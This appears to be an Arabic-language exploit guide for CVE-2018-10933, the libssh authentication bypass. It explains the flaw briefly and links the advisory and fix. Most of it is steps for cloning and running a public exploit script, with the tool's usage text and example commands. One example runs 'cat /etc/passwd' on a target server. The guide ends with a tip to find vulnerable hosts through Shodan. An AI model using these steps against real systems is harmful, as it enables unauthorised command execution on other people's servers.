
libSSH - تجاوز المصادقة
تم اكتشاف ثغرة أمنية في آلة الحالة من جانب الخادم في libssh قبل الإصدارين 0.7.6 و0.8.4. يمكن للعميل الخبيث إنشاء قنوات دون إجراء المصادقة أولاً، مما يؤدي إلى وصول غير مصرح به.
تنشأ المشكلة من الطريقة التي لا يحافظ بها libssh على حالة المصادقة وكيف يمكن استغلال ذلك لتجاوز المصادقة. ببساطة، يمكن تصور الاتصال كعملية متعددة الخطوات: الخطوة 1، الخطوة 2، الخطوة 3... بما أن libssh لا يفرض ترتيب الخطوات، يمكنك القفز مباشرة إلى الخطوة 3 دون المرور بالخطوتين 1 و2.
من المثير للاهتمام أنه تم اكتشاف نفس المشكلة في مكتبة SSH Paramiko سابقًا: CVE-2018-7750.
Exploit-DB : https://www.exploit-db.com/exploits/45638
معلومات حول CVE-2018-10933 من libSSH : https://www.libssh.org/security/advisories/CVE-2018-10933.txt
إصدار الإصلاح من libSSH : https://www.libssh.org/2018/10/16/libssh-0-8-4-and-0-7-6-security-and-bugfix-release/
sudo apt-get install python3
gh repo clone EmmanuelCruzL/CVE-2018-10933
pip3 install -r requirements.txt
python3 main.py
usage: main.py [-h] [-p PORT] [-log] [-t | -c COMMAND | -i] host
Script for the vulnerabilities CVE-2018-10933
positional arguments:
host the ip or domain address of ssh server
options:
-h, --help show this help message and exit
-p PORT, --port PORT The port the service ssh, default [22]
-log, --logfile Logfile to write conn logs
-t, --test check the version of libSSH
-c COMMAND, --command COMMAND
command to execute
-i, --interactive open the interactive mode
python3 main.py 0.0.0.0 -port 22 -t

python3 main.py 0.0.0.0 -p 22 -c "cat /etc/passwd"

python3 main.py 0.0.0.0 -p 22 -l

[!] can find devices vulnerables using shodan.io
- ( 22 Port is default, other ports like (2222, 3333, 4444) might be including libSSH )
